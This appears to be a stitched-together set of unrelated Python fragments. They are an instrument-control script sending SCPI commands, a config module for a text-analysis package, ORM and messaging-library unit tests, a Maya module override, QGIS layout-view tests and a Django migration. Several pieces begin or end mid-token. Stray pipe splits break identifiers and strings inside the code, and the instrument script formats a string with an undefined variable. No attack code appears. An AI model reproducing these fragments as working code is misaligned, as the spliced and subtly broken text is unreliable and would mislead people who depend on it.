my_instrument.query_delay=2;
print("=== Query delay: %d sec"%my_instrument.query_delay); # messagebased.py, line 118
#my_instrument._read_termination = 'R';
print("=== Read termination character: %s"%str(my_instrument._read_termination));
def control(args, inst):
command='nocommand'
examples=['MEASure:STARt','MEASEurement:STOP','SENSe:FREQuency:CENTer 2.401G','SENS:FREQ:CENT 2400M','SENS:RLEV -5', \
'SENS:FREQ:SPAN 40M','SENS:BAND:RES 10k']
if args[1]=='start':
command='start'
elif args[1]=='stop':
command='stop'
elif args[1]=='config':
if len(args)<3:
return 2, ".."
cmd='config'
param1=args[2]
command="%s"%(cmd, param1, param2)
#params={"freq":999000,"reflev":-10}
elif args[1]=='scpi-short':
if len(args)<3:
ind=0
for i in examples:
print("%d: %s"%(ind,i))
ind+=1
return 0, "Usage: python test_tcp.py scpi-short <num>"
else:
index=int(args[2])
command=examples[index]
elif args[1]=='scpi':
if len(args)<3:
return 2, "--"
cmd=args[2] # e.g. SENS:RLEV
if cmd[0:4]=="MEAS":
parameter = ""
elif cmd[0:4]=="SENS":
if len(args)<4:
return 2, "-"
else:
parameter=args[3] # e.g. -10
elif cmd[0:5]=="*IDN?":
cmd="*IDN?"
parameter=""
else:
return 2 , cmd[0:4]
command=cmd+" "+parameter
elif args[1]=='file':
f=open(args[2],'r')
i=0
print("----Script started----")
for line in f:
if line[0]!="#":
print("%02d: %s"%(i,line[:-1]))
inst.write(line)
else:
print("%02d: %s"%(i,line[:-1]))
i+=1
print("----Script finished----")
return 0, ""
else:
return 2, "...."
inst.write(command)
print("*Command sent: %s"%command)
return 0, ""
def temp():
#print(my_instrument.query('*IDN?',13)); # 13 sec query delay, optional
#print(my_instrument.query('*IDN?',2));
#my_instrument.write('*IDN?',1)
#print(my.intrument.read())
return 0
def temp_sweep():
# Linear Sweep
#print(my_instrument.write('outp:load 50'))
#print(my_instrument.write('sweep:time 1'))
#print(my_instrument.write('freq:start 5000'))
#print(my_instrument.write('freq:stop 20000'))
#print(my_instrument.write('sweep:stat on'))
#Wait for 2 seconds
#time.sleep(2)
# Stop generation
#print(my_instrument.write('sweep:stat off'))
pass
def check_arguments(args):
help="=========================== \n \
Usage: python test_tcp.py <operation> <argument> \
Where operations are: \n \
\n \
config : set Analyzer parameters\n \
config freq <Hz> \
config reflev <dBm> \
config span <Hz> \
config rbw <Hz> \
start : no argument needed\n \
stop : no argument needed\n \
==========================="
if len(args)==1:
print ("%s"%help)
return 1, ""
else:
return 0, ""
def main(args):
ret=[3, ""]
ret=check_arguments(args)
if ret[0]==1:
return 1, "Invalid arguments."
else:
print("=== Program started");
inst, ret = open_instrument() # opening reference
if ret>0: return 2 # 2--> Exit with error
#manage_client_parameters(inst)
ret = control(args, inst)
try:
close_instrument(inst)
except:
pass
#print("=====%s"%str(ret))
print("=== Program stopped, Ret: %d, %s"%(ret[0],str(ret[1])));
return ret[0]
if __name__ == '__main__':
ret = main(sys.argv)
sys.exit(ret)
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
'''
narralyzer.config
~~~~~~~~~~~~~~~~~
Handle misc config variables.
:copyright: (c) 2016 Koninklijke Bibliotheek, by Willem-Jan Faber.
:license: GPLv3, see licence.txt for more details.
'''
from os import path, listdir
from ConfigParser import ConfigParser
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
try:
from narralyzer.util import logger as logger
except:
try:
from utils import logger
except:
logger = None
class Config():
"""
Configuration module.
>>> config = Config()
>>> config.get('supported_languages')
'de en nl sp'
>>> config.get('SUPPORTED_LANGUAGES')
'DE EN NL SP'
>>> config.get('version')
'0.1'
>>> config.get('lang_en_stanford_port')
'9991'
"""
config = {
'config_file': 'conf/config.ini',
'models': None,
'root': None,
'self': path.abspath(__file__),
'supported_languages': [],
'version': '0.1',
}
logger = None
def __init__(self):
# Try to find out where the root of this package is.
if self.config.get('root', None) is None:
root = path.join(
path.dirname(
path.abspath(__file__)))
root = path.join(root, '..')
self.config['root'] = path.abspath(root)
root = self.config['root']
# Initialize the logger with the name of this class.
if self.logger is None and not logger is None:
self.logger = logger(self.__class__.__name__, 'info')
self.logger.debug("Assuming root: {0}".format(root))
# Set the path to the config-file (config.ini).
config_file = path.join(root, self.config.get('config_file'))
self.config['config_file'] = config_file
# Read and parse the config file,
# skip if this has been done before.
if self.config.get('models', None) is None:
self._parse_config(config_file)
# Config file was parsable,
def _parse_config(s | elf, config_file):
# Check if the config file at least exists.
if not path.isfile(config_file):
msg = ("Could not open config file: {0}".format(
path.abspath(config_file)))
if not self.logger is None:
self.logger.critical(msg)
sys.exit(-1)
# Use https://docs.python.org/3.5/library/co | nfigparser.html
# to open and parse the config.
config = ConfigParser()
try:
config.read(config_file)
if not self.logger is None:
self.logger.debug("Using config file: {0}".format(
config_file))
except:
if not self.logger is None:
self.logger.critical("Failed to open: {0}".format(
config_file))
# Use the values in the config-file to populate
# the config dictionary.
self.config['models'] = {}
for section in config.sections():
if section.startswith('lang_'):
language_3166 = section.replace('lang_', '')
self.config['models'][language_3166] = {
'language_3166': language_3166
}
for val in config.items(section):
if val[0] not in self.config['models'][language_3166]:
self.config['models'][language_3166][val[0]] = val[1]
if section == 'main':
for key in config.items(section):
self.config[key[0]] = key[1]
for language in self.config.get('models'):
if language not in self.config["supported_languages"]:
self.config["supported_languages"].append(language)
def get(self, variable):
# If enduser wants caps.
end_users_wants_uppercase = False
if variable.isupper():
variable = variable.lower()
# Give him or her caps!
end_users_wants_uppercase = True
result = self.config.get(variable, None)
if variable.startswith('lang_'):
# Special case for the language modes.
result = self.config.get('models', None)
# If the requested config variable was not found, exit.
if not isinstance(result, (str, dict, list)):
return None
# Parse the 'models', into lang_en_stanford_port: 9991 fashion.
if isinstance(result, dict):
if variable.endswith('stanford_path'):
requested_language = variable.replace('_stanford_path', '')
requested_language = requested_language.replace('lang_', '')
for language_3166 in result:
if language_3166 == requested_language:
ner_path = self.config.get('stanford_ner_path')
ner_path = path.join(
self.config.get('root'),
ner_path,
language_3166)
result = listdir(ner_path)[0]
result = path.join(ner_path, result)
else:
for language_3166 in result:
if not isinstance(result, dict):
continue
for key in result.get(language_3166):
key_name = "lang_{0}_{1}".format(language_3166, key)
if key_name == variable:
result = result.get(language_3166).get(key)
break
if not isinstance(result, str):
return None
# Lists will be displayed with spaces in between
if isinstance(result, list):
result = " ".join(sorted(result))
# If the requested variable is one of the .txt files,
# read the file from disk, and return it.
if isinstance(result, str):
if result.endswith(".txt"):
with open(path.join(self.config.get('root'), result)) as fh:
result = ", ".join(
[i.strip() for i in (
fh.read().split('\n')[:4])])[:-1]
# Make a wish come true
if end_users_wants_uppercase:
return result.upper()
return result
def __repr__(self):
current_config = ""
for item in sorted(self.config):
if not self.get(item) is None:
current_config += "\n\t{0}: {1}".format(item, self.get(item))
result = "Available config parameters:\n\t{0}".format(
current_config.strip())
return result
if __name__ == "__main__":
config = Config()
if len(sys.argv) >= 2 and "test" not in " ".join(sys.argv):
result = config.get(" ".join(sys.argv[1:]))
if result is None:
msg = "Config key {0} unknown.".format(" ".join(sys.argv[1:]))
if not logger is None:
config.logger.fatal(msg)
else:
print(msg)
exit(-1)
else:
print(result)
else:
if len(sys.argv) >= 2 and "test" in " ".join(sys.argv):
import doctest
doctest.testmod(verbose=True)
else:
print(config)
|
# Shorten the import for this because i | t will be used in configs
from libqtile.backend.wayland.inpu | ts import InputConfig # noqa: F401
|
ledefs import Foo, Bar
class TableTest(unittest.TestCase):
def test_init_2_AutoIdCols(self):
# Table can have only 1 AutoIdCol
try:
Table("xyz", AutoIdCol("id1"), IntCol("x"), AutoIdCol("id2"))
except AssertionError, e:
self.assertEquals("Table 'xyz' has more than one AutoIdCol", str(e))
else:
self.fail()
def test_init_duplicate_col_name(self):
try:
Table("xyz", AutoIdCol("id1"), IntCol("x"), UnicodeCol("x", 20))
except AssertionError, e:
self.assertEquals("Table 'xyz' has more than one column with name 'x'", str(e))
else:
self.fail()
def test_cols(self):
expected = ["foo_id", "i1", "s1", "d1"]
actual = [col.col_name for col in Foo.cols]
self.assertEquals(expected, actual)
expected = ["bi", "bs", "bd", "bdt1", "bb"]
actual = [col.col_name for col in Bar.cols]
self.assertEquals(expected, actual)
def test_auto_id_col(self):
# AutoIdCol field identified by __init__
self.assert_(Foo.auto_id_col is Foo.cols[0])
self.assert_(Bar.auto_id_col is None)
def test_new_parse_defaults(self):
expected = {
"foo_id": None,
"i1": 0,
"s1": "",
"d1": None,
}
actual = Foo.new()
| self.assertEquals(expected, actual)
actual = Foo.parse()
self.assertEquals(expected, actual)
expected = {
"bi": None,
"bs": "",
"bd": None,
"bdt1": None,
"bb": False,
}
actual = Bar.new()
self.assertEquals(expected, actual)
actual = Bar.parse()
self.assertEquals(expected, actual)
| def test_parse_auto_id(self):
expected = {
"foo_id": None,
"i1": 0,
"s1": "",
"d1": None,
}
actual = Foo.parse(foo_id=None)
self.assertEquals(expected, actual)
def test_new_parse_all(self):
expected = {
"foo_id": 42,
"i1": 101,
"s1": "alpha",
"d1": date(2006,6,6),
}
actual = Foo.new(foo_id=42, i1=101, s1="alpha", d1=date(2006,6,6))
self.assertEquals(expected, actual)
actual = Foo.parse(foo_id="42", i1="101", s1="alpha", d1="2006-06-06")
self.assertEquals(expected, actual)
# parse some fields str
actual = Foo.parse(foo_id="42", i1=101, s1="alpha", d1=date(2006,6,6))
self.assertEquals(expected, actual)
def test_new_parse_some_fields(self):
expected = {
"foo_id": 42,
"i1": 0,
"s1": "alpha",
"d1": None,
}
actual = Foo.new(foo_id=42, s1="alpha")
self.assertEquals(expected, actual)
actual = Foo.parse(foo_id="42", s1="alpha")
self.assertEquals(expected, actual)
def test_new_parse_clone(self):
# new() and parse() should return a new dictionary
expected = {
"foo_id": 42,
"i1": 0,
"s1": "alpha",
"d1": None,
}
actual = Foo.new(**expected)
self.assertEquals(expected, actual)
self.assertFalse(actual is expected)
actual = Foo.parse(**expected)
self.assertEquals(expected, actual)
self.assertFalse(actual is expected)
def test_new_parse_unkown_cols(self):
# DONT copy unknown columns
expected = {
"foo_id": None,
"i1": 16,
"s1": "",
"d1": None,
}
actual = Foo.new(i1=16, s2="beta")
self.assertEquals(expected, actual)
actual = Foo.parse(i1="16", s2="beta")
self.assertEquals(expected, actual)
def test_parse_empty_string(self):
# parse() replaces empty strings with default value
expected = {
"foo_id": None,
"i1": 0,
"s1": "",
"d1": None,
}
actual = Foo.parse(foo_id="", i1="", s1="", d1="")
self.assertEquals(expected, actual)
expected = {
"bi": None,
"bs": "",
"bd": None,
"bdt1": None,
"bb": False,
}
actual = Bar.parse(bi="", bs="", bd="", bdt1="", bb="")
self.assertEquals(expected, actual)
def test_new_bad_values(self):
# new() does not allow bad values
try:
Foo.new(i1="bar", s2=1.1)
except TypeError, e:
self.assertEquals("IntCol 'i1': int expected, got str", str(e))
else:
self.fail()
def test_parse_bad_values(self):
# parse() does not allow non-string bad values
try:
Foo.parse(i1=2.3, s2=1.1)
except TypeError, e:
self.assertEquals("IntCol 'i1': int expected, got float", str(e))
else:
self.fail()
def test_parse_error(self):
# parse() gives parse error for bad strings
try:
Foo.parse(i1="2.3", s2=1.1)
except ValueError, e:
self.assert_(
str(e) in [
"invalid literal for int(): 2.3",
"invalid literal for int() with base 10: '2.3'",
]
)
else:
self.fail()
def test_check_values(self):
# defaults / None
foo = Foo.new()
auto_id = Foo.check_values(foo)
self.assert_(auto_id)
# given values / no None
foo = {
"foo_id": 42,
"i1": 101,
"s1": "alpha",
"d1": date(2006,6,6),
}
auto_id = Foo.check_values(foo)
self.assertFalse(auto_id)
# bad value
foo = Foo.new()
foo["i1"] = "bar"
try:
Foo.check_values(foo)
except TypeError, e:
self.assertEquals("IntCol 'i1': int expected, got str", str(e))
else:
self.fail()
# bad value
foo = Foo.new()
foo["s1"] = 1.1
try:
Foo.check_values(foo)
except TypeError, e:
self.assertEquals("UnicodeCol 's1': unicode expected, got float", str(e))
else:
self.fail()
# unknown columns ignored
foo = Foo.new(s2=None)
foo["s3"] = 1.2
auto_id = Foo.check_values(foo)
self.assert_(True, auto_id)
def test_q(self):
q = Foo.q
# existing columns
q_foo_id = Foo.q.foo_id
q_i1 = Foo.q.i1
# non-existing column
try:
Foo.q.i2
except AttributeError, e:
self.assertEquals("QueryCols instance has no attribute 'i2'", str(e))
else:
self.fail()
def test_q_ops(self):
qexpr = Foo.q.foo_id == 1
self.assert_(isinstance(qexpr, SqlCondition))
qexpr = Foo.q.d1 == None
self.assert_(isinstance(qexpr, SqlCondition))
qexpr = Foo.q.d1 > date(2007, 5, 22)
self.assert_(isinstance(qexpr, SqlCondition))
qexpr = Foo.q.d1 >= date(2007, 5, 22)
self.assert_(isinstance(qexpr, SqlCondition))
qexpr = Foo.q.d1 < date(2007, 5, 22)
self.assert_(isinstance(qexpr, SqlCondition))
qexpr = Foo.q.d1 <= date(2007, 5, 22)
self.assert_(isinstance(qexpr, SqlCondition))
def test_q_ops_assign(self):
try:
Foo.q.foo_id = "xyz"
except AttributeError:
pass
else:
self.fail()
def test_q_ops_check_value(self):
try:
Foo.q.foo_id == "xyz"
except TypeError, e:
self.assertEquals("AutoIdCol 'foo_id': int expected, got str", str(e))
else:
self.fail()
try:
Foo.q.s1 > 23
except TypeError, e:
self.assertEquals("UnicodeCol 's1': unicode expected, got int", str(e))
else:
self.fail()
def test_q_ops_auto_id(self):
try:
Foo.q.foo_id == None
except AssertionError, e:
self. |
s.runOverriddenModule(__name__, lambda: None, globals())
Note that if modName is a sub-module, ie "myPackage.myModule", then calling
this function will cause "myPackage" to be imported, in order to determine
myPackage.__path__ (though in most circumstances, it will already have
been).
Parameters
----------
modName : str
The name of the overriden module that you wish to execute
callingFileFunc : function
A function that is defined in the file that calls this function; this is
provided solely as a means to identify the FILE that calls this
function, through the use of inspect.getsourcefile(callingFileFunc).
This is necessary because it is possible for this call to get "chained";
ie, if you have path1/myMod.py, path2/myMod.py, and path3/myMod.py,
which will be found on the sys.path in that order when you import myMod,
and BOTH path1/myMod.py AND path2/myMod.py use runOverriddenModule, then
the desired functionality would be: path1/myMod.py causes
path2/myMod.py, which causes path3/myMod.py to run. However, if
runOverriddenModule only had __name__ (or __file__) to work off of,
path2/myMod.py would still "think" it was executing in the context of
path1/myMod.py... resulting in an infinite loop when path2/myMod.py
calls runOverriddenModule. This parameter allows runOverriddenModule to
find the "next module down" on the system path. If the file that
originated this function is NOT found on the system path, an ImportError
is raised.
globals : dict
the globals that the overridden module should be executed with
Returns
-------
str
The filepath that was executed
'''
import inspect
import os.path
import sys
import imp
try:
from os.path import samefile
except ImportError:
# os.samefile does not exist on Windows (as of Python version < 3k)
# WARNING: Resorting to a less than ideal method to checking for same file
# TODO: Add deeper implementation of the samefile hack for windows
# in future, if possible.
def samefile(p1, p2):
return os.stat(p1) == os.stat(p2)
callingFile = inspect.getsourcefile(callingFileFunc)
# because the same path might be in the sys.path twice, resulting
# in THIS EXACT FILE showing up in the search path multiple times, we
# need to continue until we know the next found path is not this one - or
# any other path already found by runOverriddenModule.
# ie, suppose we have TWO modules which both use runOverriddenModule, A
# and B, and one "base" module they override, C. Then suppose our sys.path
# would cause them to be discovered in this order: [A, B, B, A, C].
# We need to make sure that we get to C even in this scenario! To do this,
# we store already-executed paths in the globals...
executedFiles = globals.get('_runOverriddenModule_already_executed')
if executedFiles is None:
executedFiles = set()
globals['_runOverriddenModule_already_executed'] = executedFiles
executedFiles.add(callingFile)
# first, determine the path to search for the module...
packageSplit = modName.rsplit('.', 1)
if len(packageSplit) == 1:
# no parent package: use sys.path
path = sys.path
baseModName = modName
else:
# import the parent package (if any), in order to find it's __path__
packageName, baseModName = packageSplit
packageMod = __import__(packageName, fromlist=[''], level=0)
path = packageMod.__path__
# now, find which path would result in the callingFile... safest way to do
# this is with imp.find_module... but we need to know WHICH path caused
# the module to be found, so we go one-at-a-time...
for i, dir in enumerate(path):
dir = path[i]
try:
findResults = imp.find_module(baseModName, [dir])
except ImportError:
continue
# close the open file handle..
if isinstance(findResults[0], file):
findResults[0].close()
# ...then check if the found file matched the callingFile
if any(samefile(findResults[1], oldFile)
for oldFile in executedFiles):
continue
else:
break
else:
# we couldn't find the file - raise an ImportError
raise ImportError("Couldn't find a version of the file %r that hadn't "
"already been executed when using path %r"
% (callingFile, path))
execfile(findResults[1], globals)
return findResults[1]
# first, run the "real" maya.utils...
runOverriddenModule(__name__, lambda: None, globals())
# ...then monkey patch it!
# first, allow setting of the stream for the shellLogHandler based on an env.
# variable...
_origShellLogHandler = shellLogHandler
def shellLogHandler(*args, **kwargs):
handler = _origShellLogHandler(*args, **kwargs)
shellStream = os.environ.get('MAYA_SHELL_LOGGER_STREAM')
if shellStream is not None:
shellStream = getattr(sys, shellStream, None)
if shellStream is not None:
handler.stream = shellStream
return handler
# ...then, override the formatGuiException method to better deal with IOError /
# OSError formatting
def formatGuiException(exceptionType, exceptionObject, traceBack, detail=2):
"""
Format a trace stack into a string.
exceptionType : Type of exception
exceptionObject : Detailed exception information
traceBack : Exception traceback stack information
detail : 0 = no trace info, 1 = line/file only, 2 = full trace
To perform an action when an exception occurs without modifying Maya's
default printing of exceptions, do the following::
import maya.utils
def myExceptCB(etype, value, tb, detail=2):
# do something here...
return maya.utils._formatGuiException(etype, value, tb, detail)
maya.utils.formatGuiException = myExceptCB
"""
# originally, this code used
# exceptionMsg = unicode(exceptionObject.args[0])
# Unfortunately, | the problem with this is that the first arg is NOT always
# the string message - ie, witness
# IOError(2, 'No such fi | le or directory', 'non_existant.file')
# So, instead, we always just use:
# exceptionMsg = unicode(exceptionObject).strip()
# Unfortunately, for python 2.6 and before, this has some issues:
# >>> str(IOError(2, 'foo', 'bar'))
# "[Errno 2] foo: 'bar'"
# >>> unicode(IOError(2, 'foo', 'bar'))
# u"(2, 'foo')"
# However, 2014+ uses 2.7, and even for 2013, "(2, 'foo')" is still better
# than just "2"...
if issubclass(exceptionType, SyntaxError):
# syntax errors are unique, in that str(syntaxError) will include line
# number info, which is what detail == 0 is trying to avoid...
exceptionMsg = unicode(exceptionObject.args[0])
else:
exceptionMsg = unicode(exceptionObject).strip()
if detail == 0:
result = exceptionType.__name__ + ': ' + exceptionMsg
else:
# extract a process stack from the tracekback object
tbStack = traceback.extract_tb(traceBack)
tbStack = _fixConsoleLineNumbers(tbStack)
if detail == 1:
# format like MEL error with line number
if tbStack:
file, line, func, text = tbStack[-1]
result = u'%s: file %s line %s: %s' % (exceptionType.__name__, file, line, exceptionMsg)
else:
result = exceptionMsg
else: # detail == 2
# format the exception
excLines = _decodeStack(traceback.format_exception_only(exceptionType, exceptionObject))
# traceback may have failed to decode a unicode exception value
# if so, we will swap the unicode back in
if len(excLines) > 0:
excLines[-1] = re.sub(r'< |
view.scaleSafe(4)
self.assertAlmostEqual(view.transform().m11(), 8)
# try to zoom in heaps
view.scaleSafe(99999999)
# assume we have hit the limit
scale = view.transform().m11()
view.scaleSafe(2)
self.assertAlmostEqual(view.transform().m11(), scale)
view.setTransform(QTransform.fromScale(1, 1))
self.assertAlmostEqual(view.transform().m11(), 1)
# test zooming out
view.scaleSafe(0.5)
self.assertAlmostEqual(view.transform().m11(), 0.5)
view.scaleSafe(0.1)
self.assertAlmostEqual(view.transform().m11(), 0.05)
# try zooming out heaps
view.scaleSafe(0.000000001)
# assume we have hit the limit
scale = view.transform().m11()
view.scaleSafe(0.5)
self.assertAlmostEqual(view.transform().m11(), scale)
def testLayoutScalePixels(self):
p = QgsProject()
l = QgsLayout(p)
l.setUnits(QgsUnitTypes.LayoutPixels)
view = QgsLayoutView()
view.setCurrentLayout(l)
view.setZoomLevel(1)
# should be no transform, since 100% with pixel units should be pixel-pixel
self.assertEqual(view.transform().m11(), 1)
view.setZoomLevel(0.5)
self.assertEqual(view.transform().m11(), 0.5)
def testSelectAll(self):
p = QgsProject()
l = QgsLayout(p)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addItem(item2)
item3 = QgsLayoutItemPicture(l)
item3.setLocked(True)
l.addItem(item3)
view = QgsLayoutView()
# no layout, no crash
view.selectAll()
view.setCurrentLayout(l)
focused_item_spy = QSignalSpy(view.itemFocused)
view.selectAll()
self.assertTrue(item1.isSelected())
self.assertTrue(item2.isSelected())
self.assertFalse(item3.isSelected()) # locked
self.assertEqual(len(focused_item_spy), 1)
item3.setSelected(True) # locked item selection should be cleared
view.selectAll()
self.assertTrue(item1.isSelected())
self.assertTrue(item2.isSelected())
self.assertFalse(item3.isSelected()) # locked
def testDeselectAll(self):
p = QgsProject()
l = QgsLayout(p)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addItem(item2)
item3 = QgsLayoutItemPicture(l)
item3.setLocked(True)
l.addItem(item3)
view = QgsLayoutView()
# no layout, no crash
view.deselectAll()
view.setCurrentLayout(l)
focused_item_spy = QSignalSpy(view.itemFocused)
view.deselectAll()
self.assertFalse(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected())
self.assertEqual(len(focu | sed_item_spy), 1)
item1.setSelected(True)
item2.setSelected(True)
item3.setSelected(True)
view.deselectAll()
self.assertFalse(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected())
def testInvertSelection(self):
p = QgsProject()
l = Q | gsLayout(p)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addItem(item2)
item3 = QgsLayoutItemPicture(l)
item3.setLocked(True)
l.addItem(item3)
view = QgsLayoutView()
# no layout, no crash
view.invertSelection()
view.setCurrentLayout(l)
focused_item_spy = QSignalSpy(view.itemFocused)
view.invertSelection()
self.assertTrue(item1.isSelected())
self.assertTrue(item2.isSelected())
self.assertFalse(item3.isSelected()) # locked
self.assertEqual(len(focused_item_spy), 1)
item3.setSelected(True) # locked item selection should be cleared
view.invertSelection()
self.assertFalse(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected()) # locked
def testSelectNextByZOrder(self):
p = QgsProject()
l = QgsLayout(p)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addItem(item2)
item3 = QgsLayoutItemPicture(l)
item3.setLocked(True)
l.addItem(item3)
view = QgsLayoutView()
# no layout, no crash
view.selectNextItemAbove()
view.selectNextItemBelow()
view.setCurrentLayout(l)
focused_item_spy = QSignalSpy(view.itemFocused)
# no selection
view.selectNextItemAbove()
view.selectNextItemBelow()
self.assertEqual(len(focused_item_spy), 0)
l.setSelectedItem(item1)
self.assertEqual(len(focused_item_spy), 1)
# already bottom most
view.selectNextItemBelow()
self.assertTrue(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected())
self.assertEqual(len(focused_item_spy), 1)
view.selectNextItemAbove()
self.assertFalse(item1.isSelected())
self.assertTrue(item2.isSelected())
self.assertFalse(item3.isSelected())
self.assertEqual(len(focused_item_spy), 2)
view.selectNextItemAbove()
self.assertFalse(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertTrue(item3.isSelected())
self.assertEqual(len(focused_item_spy), 3)
view.selectNextItemAbove() # already top most
self.assertFalse(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertTrue(item3.isSelected())
self.assertEqual(len(focused_item_spy), 3)
view.selectNextItemBelow()
self.assertFalse(item1.isSelected())
self.assertTrue(item2.isSelected())
self.assertFalse(item3.isSelected())
self.assertEqual(len(focused_item_spy), 4)
view.selectNextItemBelow()
self.assertTrue(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected())
self.assertEqual(len(focused_item_spy), 5)
view.selectNextItemBelow() # back to bottom most
self.assertTrue(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected())
self.assertEqual(len(focused_item_spy), 5)
def testLockActions(self):
p = QgsProject()
l = QgsLayout(p)
view = QgsLayoutView()
view.setCurrentLayout(l)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addItem(item2)
item3 = QgsLayoutItemPicture(l)
l.addItem(item3)
item1.setLocked(True)
item3.setLocked(True)
self.assertTrue(item1.isLocked())
self.assertFalse(item2.isLocked())
self.assertTrue(item3.isLocked())
view.unlockAllItems()
self.assertFalse(item1.isLocked())
self.assertFalse(item2.isLocked())
self.assertFalse(item3.isLocked())
self.assertTrue(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertTrue(item3.isSelected())
view.lockSelectedItems()
self.assertTrue(item1.isLocked())
self.assertFalse(item2.isLocked())
self.assertTrue(item3.isLocked())
self.assertFalse(item1.isSelected())
self.assertFalse(item2.isSelected())
self.assertFalse(item3.isSelected())
def testStacking(self):
p = QgsProject()
l = QgsLayout(p)
# add some items
item1 = QgsLayoutItemPicture(l)
l.addLayoutItem(item1)
item2 = QgsLayoutItemPicture(l)
l.addLayoutItem(item2)
item3 = QgsLayoutItemPicture(l)
l.addLayoutItem(item3)
view = QgsLayoutView()
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("zerver", "0301_fix_unread_messages_in_deactivated_streams"),
]
operations = [
# We do Stream lookups case-insensitively with respect to the name, but we were missing
# the appropriate (realm_id, upper(name: | :text)) unique index to enforce uniqueness
# on database level.
migrations.RunSQL(
"""
CREATE UNIQUE INDEX zerver_stream_realm_id_name_uniq ON zerver_stream (realm_id, u | pper(name::text));
"""
),
migrations.AlterUniqueTogether(
name="stream",
unique_together=set(),
),
]
|
1 = compat.entry_to_queue("foo", **dict(defs))
self.assertEqual(q1.name, "foo")
self.assertEqual(q1.routing_key, "foo.#")
self.assertEqual(q1.exchange.name, "fooex")
self.assertEqual(q1.exchange.type, "topic")
self.assertTrue(q1.durable)
self.assertTrue(q1.exchange.durable)
self.assertFalse(q1.auto_delete)
self.assertFalse(q1.exchange.auto_delete)
q2 = compat.entry_to_queue("foo", **dict(defs,
exchange_durable=False))
self.assertTrue(q2.durable)
self.assertFalse(q2.exchange.durable)
q3 = compat.entry_to_queue("foo", **dict(defs,
exchange_auto_delete=True))
self.assertFalse(q3.auto_delete)
self.assertTrue(q3.exchange.auto_delete)
q4 = compat.entry_to_queue("foo", **dict(defs,
queue_durable=False))
self.assertFalse(q4.durable)
self.assertTrue(q4.exchange.durable)
q5 = compat.entry_to_queue("foo", **dict(defs,
queue_auto_delete=True))
self.assertTrue(q5.auto_delete)
self.assertFalse(q5.exchange.auto_delete)
self.assertEqual(compat.entry_to_queue("foo", **dict(defs)),
compat.entry_to_queue("foo", **dict(defs)))
class test_Publisher(unittest.TestCase):
def setUp(self):
self.connection = BrokerConnection(transport=Transport)
def test_constructor(self):
pub = compat.Publisher(self.connection,
exchange="test_Publisher_constructor",
routing_key="rkey")
self.assertIsInstance(pub.backend, Channel)
self.assertEqual(pub.exchange.name, "test_Publisher_constructor")
self.assertTrue(pub.exchange.durable)
self.assertFalse(pub.exchange.auto_delete)
self.assertEqual(pub.exchange.type, "direct")
pub2 = compat.Publisher(self.connection,
exchange="test_Publisher_constructor2",
routing_key="rkey",
auto_delete=True,
durable=False)
self.assertTrue(pub2.exchange.auto_delete)
self.assertFalse(pub2.exchange.durable)
explicit = Exchange("test_Publisher_constructor_explicit",
type="topic")
pub3 = compat.Publisher(self.connection,
exchange=explicit)
self.assertEqual(pub3.exchange, explicit)
def test_send(self):
pub = compat.Publisher(self.connection,
exchange="test_Publisher_send",
routing_key="rkey")
pub.send({"foo": "bar"})
self.assertIn("basic_publish", pub.backend)
pub.close()
self.assertIn("close", pub.backend)
def test__enter__exit__(self):
pub = compat.Publisher(self.connection,
exchange="test_Publisher_send",
routing_key="rkey")
x = pub.__enter__()
self.assertIs(x, pub)
x.__exit__()
self.assertIn("close", pub.backend)
self.assertTrue(pub._closed)
class test_Consumer(unittest.TestCase):
def setUp(self):
self.connection = BrokerConnection(transport=Transport)
def test_constructor(self, n="test_Consumer_constructor"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
self.assertIsInstance(c.backend, Channel)
q = c.queues[0]
self.assertTrue(q.durable)
self.assertTrue(q.exchange.durable)
self.assertFalse(q.auto_delete)
self.assertFalse(q.exchange.auto_delete)
self.assertEqual(q.name, n)
self.assertEqual(q.exchange.name, n)
c2 = compat.Consumer(self.connection, queue=n + "2",
exchange=n + "2",
routing_key="rkey", durable=False,
auto_delete=True, exclusive=True)
q2 = c2.queues[0]
self.assertFalse(q2.durable)
self.assertFalse(q2.exchange.durable)
self.assertTrue(q2.auto_delete)
self.assertTrue(q2.exchange.auto_delete)
def test__enter__exit__(self, n="test__enter__exit__"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
| x = c.__enter__()
self.assertIs(x, c)
x.__exit__()
self.assertIn("close", c.backend)
self.assertTrue(c._closed)
def test_iter(self, n="test_iterqueue"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
c.close()
def test_process_next(self, n="test_process_next"):
c = compat.Consumer(self.conn | ection, queue=n, exchange=n,
routing_key="rkey")
self.assertRaises(NotImplementedError, c.process_next)
c.close()
def test_iterconsume(self, n="test_iterconsume"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
c.close()
def test_discard_all(self, n="test_discard_all"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
c.discard_all()
self.assertIn("queue_purge", c.backend)
def test_fetch(self, n="test_fetch"):
c = compat.Consumer(self.connection, queue=n, exchange=n,
routing_key="rkey")
self.assertIsNone(c.fetch())
self.assertIsNone(c.fetch(no_ack=True))
self.assertIn("basic_get", c.backend)
